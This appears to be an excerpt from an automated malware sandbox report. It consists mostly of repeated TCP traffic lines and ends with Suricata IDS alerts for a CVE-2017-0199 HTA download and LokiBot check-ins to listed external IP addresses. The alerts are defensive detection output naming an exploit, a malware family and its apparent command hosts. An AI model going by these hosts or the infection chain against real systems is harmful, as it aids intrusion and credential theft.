Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
Source: global traffic	TCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49166
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
